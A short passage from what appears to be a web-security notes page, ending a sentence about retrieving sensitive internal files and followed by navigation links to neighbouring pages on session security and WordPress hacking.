   to retrieve sensitive internal files.

PreviousSESSION SECURITY NextHACKING WORDPRESS

Last updated 3 months ago